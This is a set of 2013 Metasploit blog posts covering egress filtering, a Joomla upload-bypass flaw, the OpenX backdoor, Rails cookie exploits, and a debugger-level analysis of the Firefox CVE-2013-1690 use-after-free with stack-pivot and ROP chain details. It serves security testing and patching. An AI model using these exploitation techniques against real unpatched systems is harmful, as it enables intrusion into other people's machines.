Skip navigation
All Places > Metasploit > Blog
16 17 18 19 20 Previous Next

Metasploit

665 posts

Most companies have firewall rules that restrict incoming traffic, but not everyone thinks to restrict data leaving the network. That's a shame, because a few easy configurations can save you a lot of headaches.

 

Firewall egress filtering controls what traffic is allowed to leave the network, which can prevent leaks of internal data and stop infected hosts from contacting their command & control servers. NAT alone won't help you - you actually have to restrict the ports through which your internal hosts can communicate with the outside world. Consider this interesting story on the Spiceworks Community about a company getting heavily infected with malware - and one of their lessons learned:

 

spiceworks-GUIn00b.png"We’ve concluded that it’s worth it to configure a firewall with an "Allow Only/Deny All" rule set for a LAN. That is to only allow the LAN services specifically defined in the firewall’s rule sets and otherwise deny all other traffic. There have been discussions before about the risk implications of the reciprocate method, which is what we were configured with at the time -- a "Deny Only/Allow All" LAN rule set. That is where ALL LAN sources using ANY TCP/UDP protocol are allowed to reach ANY LAN or WAN destination unless otherwise specifically denied. The argument for that is it allows your internal services to function and allow your traffic OUT unhindered while still keeping things from getting IN, which is true and is a common practice. However, it is abundantly clear that had we been using the more restrictive methodology of "Allow Only/Deny All" on our LAN just as is always the case for the WAN, we would have inherently been blocking outgoing traffic on the 8xxx and 9xxx ports this thing was using to contact its Command & Control servers and dump sites."

 

If you don't do any firewall egress filtering today, there are two basic directions you could go in:

 

  1. If you have a high appetite for security, block everything except ports you really need and filter all web traffic through a proxy. However, this approach requires you to know which ports are required by your business, and which ones show traffic but are not necessary. The risk of getting it wrong is relatively high, so you need to do a lot of upfront work talking to the business owners of all internal applications to map out which ports are required from which systems.
  2. The easier route is to allow everything but block certain ports and ranges that are most likely to expose your network. For example, just blocking IRC and NetBIOS/SMB traffic can save quite a bit of future pain.

 

The Firewall Egress FAQ from SANS is a great paper to help you with your journey. In a nutshell, here is the minimum level of traffic you should be filtering:

 

  • MS RPC (TCP & UDP 135)
  • NetBIOS/IP (TCP 139 & UDP 137)
  • SMB/IP (TCP 445)
  • Trivial File Transfer Protocol - TFTP (UDP 69)
  • Syslog (UDP 514)
  • Simple Network Management Protocol – SNMP (UDP 161-162)
  • SMTP from all IP's but our mail server (TCP 25)
  • Internet Relay Chat – IRC (TCP 6660-6669)
  • ICMP Echo-Replies (type 0 code 0)*
  • ICMP Host Unreachables (type 3 code 1)*
  • ICMP Time Exceeded in Transit (type 11 code 0)*

 

*Some folks will argue that blocking ICMP breaks with RFC 1812 and is generally anti-social, but it can be a good idea security-wise. Feel free to comment below if you have a point of view on this.

 

There is an easy way to test whether these ports are blocked on your firewall: The latest version of Metasploit Pro includes a Firewall Egress Testing MetaModule that contacts an external server on any TCP ports you specify and provides you with a report of open, filtered, and closed ports. It's so easy to use that it doesn't really require an explanation - here's a screenshot of the interface:

 

firewall-egress-filtering-testing-metasploit.png

 

If you'd like to test out Metasploit Pro's new Firewall Egress Testing MetaModule, you can get a Metasploit trial version on the Rapid7 website.

Cooperative Disclosure

I'm in attendance this year at Rapid7's UNITED Security Summit, and the conversations I'm finding myself in are tending to revolve around vulnerability disclosure. While Metasploit doesn't traffic in zero-day vulnerabilities every day, it happens often enough that we have a disclosure policy that we stick to when we get a hold of newly uncovered vulnerabilities.

 

What's not talked about in that disclosure policy is the Metasploit exploit dev community's willingness to help you, the unaffiliated researcher, to build out Metasploit modules that exercise your new awesome bug. While the usual procedure is to put together your module and send us a Pull Request, if you're dealing in undisclosed vulns, you probably don't want to spill the beans before your disclosure is public and the vendor has had a chance to react.

 

In those cases, a little more private tutelage might be the thing for you. This week, Juan Vazuquez did just that with contributor Charlie Eriksen and his shiny new Graphite vulnerability. It's pretty easy to put together a private git repo, work out whatever bugs, cleanup, and style tips that are necessary for your module to hit the prime time, and then land it to the main Metasploit distribution once the disclosure parts are done.

 

Expressing a new vulnerability as a Metasploit module is more than mere fame and fortune for the exploit dev. Public Metasploit modules are just about the best way today to bring public visibility to your bug. This, in turn, has a nearly magical effect on get patches rolled out or other mitigation in record time, which makes the Internet as a whole a stronger, more resilient, and more useful network.

 

So, if you're sitting on some undisclosed vulnerabilities and you're not super sure how to go about turning them into generally useful Metasploit modules, just ask! Both the Rapid7-employed exploit devs and the larger Metasploit community are always happy to help out with some mano-y-mano module writing, and we're pretty good at keeping new, undisclosed vulns off of Twitter (at least, for a little while).

 

Joomla Bug in the Wild

Speaking of patching, late last week, Metasploit exploit developer Juan Vazquez wrote up the latest Joomla bug as part of putting together a module to exploit it. I won't rehash it all here, but if you're of the Joomla persuasion, this will hopefully be another example of a public Metasploit module spurring along your own scanning and patching process.

 

If you run an enterprise IT shop, you know that Joomla is one of those technologies that has a tendency to pop up in your environment, even if it's not on your explicit whitelist of approved technologies. It's pretty easy to set up and use, so you might be surprised to find it humming along in your environment as people (with all the best intentions!) fire up an instance to run their local knowledge base or internal blog or whatever. And, since those folks aren't running sanctioned and blessed IT-approved software, who knows if they'be been keeping up on their patches. So, along with this latest module, it might be a good time to break out the old Joomla Version scanner module to tally up what's running.

 

New Modules

We've got ten new modules this week, including the new Joomla module mentioned above. Enjoy!

 

Exploit modules

 

Auxiliary and post modules

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

juan.vazquez

Time To Patch Joomla

Posted by juan.vazquez Employee Aug 15, 2013

Joomla released earlier this month a security advisory for unauthorized uploads affecting to Joomla! version 2.5.13 and earlier 2.5.x versions; and version 3.1.4 and earlier 3.x versions. Later, news has arisen announcing the vulnerability had been exploited in the wild. According to Versafe, who has reported and analyzed the attack in the wild, a significant increase of Joomla hacked systems could result from this vulnerability.

 

As a summary, a vulnerability exists on the Media Manager component, part of the Joomla core, which allows the user to upload files, as images, to the application. The problem exists while validating the extension of the uploaded files, where the filters could be bypassed just by appending a "." (dot) to the end of the filename.

 

If the reader is interested in more details, a twitter from webDEViL was published identifying the patch and the potential vulnerability:

 

twitter.png

 

Also, the vulnerability analysis, explaining the problem with the validation applied, has been published. For the lazier, we've highlighted the conclusions :-):

 

analysis.png

 

As a result, by using this vulnerability, files with names like shellcode.php. (note the trailing dot!) can be uploaded to the Joomla web application path (folder), which otherwise wouldn't be possible. The bad news is that Apache will deal with the file as PHP, since the empty extension isn't (probably) a mime-type known by the web server. This combination results in remote, arbitrary PHP code execution.

 

By inspecting a little more the Joomla application, there are two (easy to find) places where the Media Manager component is used:

 

  • On the Administrator Panel: but yeah, access to the admin panel is necessary, which doesn't look like the best option for exploitability. Even when it's vulnerable to the described arbitrary file upload!

 

admin_file_upload.png

 

  • From the "Submit Article" (content creation) feature, where attaching, for example, an image to the content:


submit_article.png


This path looks more interesting for an exploit, since only permissions for creating contents are needed in order to access the exploitable function. This permissions is allowed by default to some roles like Authors or Editors, but is also granted to Public (anonymous) roles on several sites:


permissions.png


So far so good, all the reviewed information is sufficient enough to build a Metasploit module in order to check a Joomla site:

 

session.png

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

The weekly Metasploit update is out, and I wanted to highlight three modules that landed in the last week, all of which target open source software. It's easy to drink the FOSS Kool-Aid, and talk about how it's more inherently secure than secret source software, but sadly, security is Hard Work, even in happy-hippie open source land.

 

OpenX Backdoored

First, a little background -- Heise Security reported that the OpenX open source ad server got itself backdoored on August 6, and this was quickly confirmed by a post on the OpenX Blog. If you happen to use this software, you'll want to update to at least version 2.8.11 pretty much right now.

 

If you don't, well, then your friendly neighborhood penetration tester would like to have a word with you, and that word will likely take the form of James @egyp7 Lee's new Metasploit module, OpenX Backdoor PHP Code Execution, which leverages the existing backdoor functionality to execute arbitrary commands.

 

As of today, nobody knows (or nobody's saying) how and exactly when OpenX got backdoored. Since it's an open source project, it seems unlikely that it would have been backdoored by an OpenX.com employee, but more likely by an evil contributor (or someone impersonating an evil contributor).

 

This is why, really, I'm bringing up the OpenX compromise. Open source is great and all, but it's not magical. We spend a pretty decent amount of energy ensuring that contributions to Metasploit are not malicious, and we try to get to know pretty much everyone who's contributed more than once or twice. I know of a handful of sketchy pull requests that we've had to reject (binary-only ASM payloads leap to mind), and everyone who has commit access to the main Metasploit repository is very conscious of this trusted-outsider threat.

 

So, if you're involved in an open source project, or use open source software, feel free to peek in on the codebase from time to time; open source is a two way street, and to invoke Eric S. Raymond, more eyeballs not only mean shallower bugs, but also tend toward higher source security.

 

Speaking of (not) Backdooring Metasploit...

This week, we have a new exploit that maintainers of Rails applications should take note of: joernchen's new exploit, Ruby on Rails Known Secret Session Cookie Remote Code Execution. Before anyone asks, yes, Metasploit Pro (and every other Rails app on Earth) is technically vulnerable. However, Metasploit (and all those other Rails apps) are only vulnerable if the attacker has insider knowledge already. It's similiar to the idea that that SSH servers are vulnerable to attack if the attacker already has an authorized private key. Allow me to elaborate.

 

For joernchen's exploit to be successful, the attacker needs to already know the secret token that Rails uses to authenticate session cookies. Normally, of course, this token isn't exposed, since it's called "secret" for a reason. However, if an attacker does manage to learn the secret (often through sloppy source control), then he can not only impersonate other users (already bad), but bake a "poisonous cookie" full of executable Ruby code (way worse).

 

Unfortunately, most source control systems aren't smart enough by default to avoid checking in secret tokens. As an application developer, you need to go out of your way to avoid it... so much for secure by design?

 

For more on Rails secret tokens, Robert Heaton's blog post is about the best reference I know about right now. In the meantime, if you happen across an internal or cloud-based source control repository for a Rails application during a pen-testing engagement, this module is a super handy way to demonstrate the risk inherent in source tracking secrets like this. If you've already accidentally checked in your application's secret (and it's more likely than you might think), you will want to change it now (and fail to check it back in). Incidentally, for Metasploit Pro (and Community and Express), the secret token is randomly generated per local installation; we don't ship with a default token or anything silly like that.

 

 

And speaking of Marshalled Code Execution...

The last module I wanted to highlight in particular this week is one for Square's open source Squash bug reporting software. This is another Rails application, and it turns out, the YAML data that gets handled by the Squash server could get run (as executable code) without a valid API token.

 

This is another case of failing to have safe, sane, and secure defaults. I think Reddit user catcradle5 put it best with with his comment, "It's so silly that there is a (default) YAML.load and then a YAML.safe_load." I couldn't agree more; seems to me it'd be better to have the load() method and the seriously_dangerous_load() method so developers are absolutely clear on the choices they're making.

 

But hey, at least their secret token isn't shipped with source, but is instead generated as part of setup, so good on them for that.

 

 

New Modules

 

We've got ten new modules with this week's update, nearly all of them exploits. Aside from the modules mentioned above, contributor Michael Messner continues his frontal assault on consumer-grade access points with a pair of new D-Link modules, juan and sinn3r spent some time beating up on HP enterprise apps, Brendan Coles converted Serge Gorbunov's Open-FTPD vuln to Metasploit, we're now shipping last week's Firefox exploit with some updated targeting, and Borja Merino delivered a nifty local DNS cache dump post module. That last one is good for a quick assessment of what all's going on on the inside of a compromised network, handy for figuring out where the nearest domain controller is without making a whole lot of post-exploitation noise.

Thanks all!

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

At Black Hat 2013 in Vegas this year, our very own Tod Beardsley was cornered by SecureNinja TV and social engineered into giving an interview. Here is the result - captured for eternity:

 

Open Source Metasploit, Now on ARM

The annual pilgrimage to Las Vegas for the various security shows is over, and we're all back in real life now... but not before proving, in a slightly different and probably ill-considered way, that Metasploit runs on ARM:

 

metasploit-on-arm.jpg

Yep, that's my arm, with Metasploit permanently installed. I'm pretty well committed to this notion of open source security; I talked with the folks at SecureNinja about Metasploit Framework in particular (see the video), as well as at BSidesLV about open source security in general with Mister_X (have another video). So, thanks to all of you, users and developers alike, for making Metasploit such the overwhelming and humbling success it is.

 

Open Source Standards

Speaking of my and Rapid7's commitment to open source, it's high time that we got with the rest of the Ruby development community. We're embarking on a project to convert our massive, highly used, often updated Ruby codebase to the Ruby standard of "two space" indentation. While that might seem like a big deal, we know that just jumping in and doing it will instantly cause code conflicts for pretty much everyone else. So, we're taking a measured approach, and have cobbled together a plan for mass tab destruction throughout Metasploit.

 

The short story is, once this pull request is merged to the master branch, community contributors who work on other Ruby widgets no longer need to set up special environments for working with Metasploit; your usual configurations will work here as well. By October, this should all be behind us, GitHub default layouts of code and diffs will look normal, and the world will be a better place. Hooray!

 

Advanced !persistent Threats: CVE-2013-1690

Also over conference time, it was revealed that there was some malware leveraging an older Firefox vulnerability targeting specifically the Tor Browser Bundle. The exploit implementation was pretty complex, so we took a run at it pretty much as soon as the shows were over. See @sinn3r's and Juan Vazquez's detailed blog post and module, published earlier today. While the threat was certainly advanced, it was the opposite of persistent; according to samples and reports, the payload's entire purpose was to phone home with the victim's MAC address and IP address and get out of there, thus piercing the anonymity that Tor intends to provide.

 

While the Metasploit module is not currently functional against TBB specifically, it does work against plain-Jane, unpatched Firefox. In addition, it doesn't merely collect information about targets, but pops shells like a proper, well-behaved exploit should.

 

What this means for you: it's a fine time to test if your network or host-based IDS/IPS/AV is catching the specific TBB exploit, or if they're going the extra mile and catching the exercise of the vulnerability. This kind of alternate implementation and validation is always useful to keep your security vendors honest.

 

Incidentally, if you'd like to throw in on making the Metasploit module for CVE-2013-1690 more universally useful, feel free to catch up with the blog post and create your own branch for Metasploit Framework over on GitHub to get to it.  To be honest, we don't deal with Firefox vulns very often, since the common experience is that the patches are too hard to avoid, thanks to Mozilla's aggressive patch practices.  In this case, what with all the LiveCDs and other read-only media, it could be useful for a penetration-tester to have something like this in his pocket for that next social engineering engagement against targets who might favor stability over security a little too much.

 

New Modules

 

We've got five new modules with this week's update, including a conversion of Tavis @taviso Ormandy's privilege escalation exploit and the slew of PineApp issues, once again reversed from ZDI advisories by our own Juan Vazquez.

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

fbi_logo_twitter.jpeg.jpgHello fellow hackers,

 

I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you.  During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.

 

Brief Analysis

 

The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here.

 

We began with a crash with a modified version of the PoC:

 

eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac
eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08            mov     ecx,dword ptr [eax]  ds:0023:72622f2f=????????

 

EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc:

 

...
bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g"
...
Addr=0x07adb980, Size=0x000000c4
ChildEBP RetAddr
0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57]
0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 497]

 

The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function. When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store that:

 

nsresult
NS_NewContentViewer(nsIContentViewer** aResult)
{
  *aResult = new DocumentViewerImpl();
  NS_ADDREF(*aResult);
  return NS_OK;
}











 

In the PoC, window.stop() is used repeatedly that's meant to stop document parsing, except they're actually not terminated, just hang.  Eventually this leads to some sort of exhaustion and allows the script to continue, and the DocumentViewerImpl object lives on.  And then we arrive to the next line: ownerDocument.write().

 

The ownerDocument.write() function is used to write to the parent frame, but the real purpose of this is to trigger xul!nsDocShell::Destroy, which deletes DocumentViewerImpl:

 

Free DocumentViewerImpl at: 0x073ab940
ChildEBP RetAddr  
000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10
000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]
000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]
000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]
000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]
000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]
000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]
000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]
000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]
000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]
000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]
000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]
000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]
000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]
000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]
000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]
000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]
000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]
000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]
000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345]

 

What happens next is after the ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function will access the invalid memory, and crashes. At this point you might see two different racy crashes: Either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of the memory happens to fit in there. Or you crash at mov ecx, dword ptr [eax] like the following:

 

0:000> r
eax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24ac
eip=014c51ed esp=000b4510 ebp=000b4514 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????

0:000> u . L3
014c51ed 8b08            mov     ecx,dword ptr [eax]
014c51ef 50              push    eax
014c51f0 ff5104          call    dword ptr [ecx+4]

 

However, note the crash doesn't necessarily have to end in xul!nsDocumentViewer::Stop, because in order to end up this in code path, it requires two conditions, as the following demonstrates:

 

DocumentViewerImpl::Stop(void)
{
  NS_ASSERTION(mDocument, "Stop called too early or too late");
  if (mDocument) {
    mDocument->StopDocumentLoad();
  }

  if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry)
    mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode);

  mStopped = true;

if (!mLoaded && mPresShell) {  // These are the two conditions that must be met
    // If you're here, you will crash
    nsCOMPtrshellDeathGrip(mPresShell);
    mPresShell->UnsuppressPainting();
}

  return NS_OK;
}









 

We discovered the above possibility due to the exploit in the wild using a different path to "call dword ptr [eax+4BCh]" in function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives in xul!nsDocumentViewer::Stop.  It's also using an information leak to properly craft a NTDLL ROP chain specifically for Windows 7. The following example based on the exploit in the wild should demonstrate this, where we begin with the stack pivot:

 

eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001
eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
xul!xpc_LocalizeContext+0x3ca3f:
66f05c12 ff90bc040000    call    dword ptr [eax+4BCh] ds:0023:120a44d4=33776277

 

We can see that the pivot is a XCHG EAX,ESP from NTDLL:

 

0:000> u 77627733 L6
ntdll!__from_strstr_to_strchr+0x9b:
77627733 94              xchg    eax,esp
77627734 5e              pop     esi
77627735 5f              pop     edi
77627736 8d42ff          lea     eax,[edx-1]
77627739 5b              pop     ebx
7762773a c3              ret

 

After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution:

 

0:000> dd /c1 esp L9
120a4024  77625f18 ; ntdll!ZwProtectVirtualMemory
120a4028  120a5010
120a402c  ffffffff
120a4030  120a4044
120a4034  120a4040
120a4038  00000040
120a403c  120a4048
120a4040  00040000
120a4044  120a5010

 

Note: The original exploit does not seem to go against Mozilla Firefox 17 (or other buggy versions) except for Tor Browser, but you should still get a crash.  We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they got nothing to hide :-)

 

Metasploit Module

 

Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned.  Meanwhile, feel free to play FBI in your organization, excise that exploit on your next social engineering training campaign.

 

Screen Shot 2013-08-07 at 2.10.40 AM.png

 

Mitigation

Protecting against this exploit is typically straightforward: All you need to do is upgrade your Firefox browser (or Tor Bundle Browser, which was the true target of the original exploit). The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple days later, so the world has had a little over a month to get with the patched versions. Given that, it would appear that the original adversaries here had reason to believe that at least as of early August of 2013, their target pool had not patched.

 

If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services often are relying on read-only media, like a LiveCD or a RO virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks we have a case where good security advice (don't save anything on your secret operating system) got turned around into a poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned.

Vegas Time!

Like the rest of the information security industry, we're buttoning down for the annual pilgramage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our phones to avoid casual ownage, and test driving our new Chromebook builds of Metasploit Pro. They're pretty sweet. The latest update for ARM-arch Kali should run without a problem on a SD Card-installed Chromebook alternate OS, as seen here:

 

msf-chromebook-front.jpg

 

This just in: Metasploit Pro is known to successfully pop shells from a Galaxy Tab, as well -- this photo courtesy of Mati "muts" Aharoni of Offensive Security:

mspro-galaxy-tab.png

While the technical work is impressive by itself, the decals that Lance @lsanchez-r7 Sanchez cooked up pretty much steal the show:

msf-chromebook-back.jpg

 

Yeah, we're pretty pleased with these. (:

 

As far as confirmed meatspace appearances from the Rapid7 Metasploit contingent, nex and rep are presenting at  BlackHat about Cuckoo Sandbox,  todb will be speaking at BSidesLV Common Ground with Thomas d'Otreppe about the vices and virtues of open source security, and of course Egypt will be delivering in-depth Metasploit training at BlackHat.

 

So, be careful out there, stay safe (infosec-wise, if not health-wise), swing by our BlackHat Booth #517 for some awesome Metasploit 10-year anniversary T-shirts, and let's see what we can do to advance the state of the art of open source security for another year or ten.

 

New Modules

 

We've got seven new modules with this week's update. As you can see below, this week is pretty heavy on the ZDI-reversed exploits. We've got ZDI-13-352 for HP products, a couple vectors for ZDI-13-110 for Apple Quicktime, and ZDI-13-147 for VMWare.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Even when offensive security techniques have been publicly discussed at conferences and proof of concept code or open source tools are available, using them in your projects can be very time consuming and may even require custom development. Metasploit Pro 4.7 now introduces MetaModules, a unique new way to simplify and operationalize security testing for IT security professionals.

 

MetaModules automate common yet complicated security tests that provide under-resourced security departments a more efficient way to get the job done. The current release includes six MetaModules for security controls testing and penetration testing, which supply common functionality such as validating which outbound firewall ports are open, testing for default credentials or stealthily discovering hosts on the network.

 

Metasploit_MetaModules.png

 

Here's an overview of the new MetaModules:

 

  • Firewall Egress Testing: Validate which outbound firewall ports are open to audit your firewall egress. This MetaModule contacts a Rapid7-hosted server to test open ports and delivers the results in one easy report. (Documentation)
  • Passive Network Discovery: Stealthily discover hosts and services on the network without sending a single packet. Some penetration tests place value on breaching the network without triggering alarms. This MetaModule sniffs the network traffic and maps out hosts and services as a first step in a network - without risking the chance of detection. All data is automatically available in the Metasploit Pro project so you can plan your attack.(Documentation)
  • Single Credentials Testing: These three MetaModules can help you test where certain passwords, hashes, or SSH keys can be used. In enterprise IT environments, you can test, for example, whether development credentials are mistakenly used on production systems. As part of a penetration test, you can try out credentials on thousands of hosts at a time without using a payload to reduce the likelihood of detection. These MetaModules attempt to log on to several service types and reports the results. There are three MetaModules in this category: Single Password Testing consumes user/password combinations; Pass the Hash consumes password hashes; and SSH Key Testing validates which systems a particular SSH private key grants access to. (Documentation for single password, pass the hash, SSH keys)
  • Known Credentials Intrusion: Compromise machines on the network using verified credentials. After having determined which credential works on which machine, use this easy MetaModule to compromise a machine and create a session. (Documentation)


MetaModules are based on a unique architecture that will enable development of more packaged security testing. MetaModules are another example of Rapid7’s commitment to operationalizing security controls testing, the best practice of verifying that your defensive solutions are effective in keeping attackers out.


While the new MetaModules are exclusive to the Metasploit Pro Edition, Rapid7 continues to deliver regular updates to Metasploit Framework, such as new exploits and other modules, as they become available.

 

We will be hosting a Metasploit 4.7 webcast on Tuesday, July 23 at 2pm ET that will discuss MetaModules in detail and show you how to use them.

 

New Modules since 4.6.0

 

Of course, the Metasploit exploit development community has been chugging along since 4.6.0 was released, so we've got a ton of new vulnerability content in this release as well, which are available in both the commercial and free editions. From the recent IPMI modules, to the SAP scanners, to the embedded device exploits for pretty much every home access point manufacturer, we've got more than enough to keep you busy on your next penetration testing engagement. Below is the list of the 91 new modules in all; 54 exploits, 34 auxiliary modules, and 3 post modules, all new since Metasploit 4.6.0.

 

Exploits

 

Auxiliary

 

Post

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

You may recall that back in May, we announced a Metasploit design contest to commemorate 10 years of Metasploit -- and now, it's time to announce the (many) winners! Once again, the open source security community has blown me away with your creativity, dedication, and subversive humor. We had a total of 118 designs (most of which did not suck!) from 55 designers. Not bad for a nearly completely hashtag-driven contest! In fact, we ended up with not just one final winning design, but four -- we ended up picking out three designs for t-shirts as well. In addition, we'll be incorporating DisK0nn3cT's "10 years of elegant pwnage" tag line, which will be on the backs of the final T-shirts.

 

Hexified Shield

Recalling our shellcode Metasploit T-shirt of a couple years ago, Wigle provided the Metasploit Shield logo in bytecode. And yes, the bytecode is meaningful, although this T-shirt cannot be run in DOS mode.

metasploit-hex-shield.png

 

Fanged Metasploit Wordcloud

Metasploit is offensive security software, after all, so sharp edges are to be expected. Thanks to weaknetlabs for this design with big, pointy teeth.

metasploit-dripping-keywords.png

 

All Hail the Hypnohacker

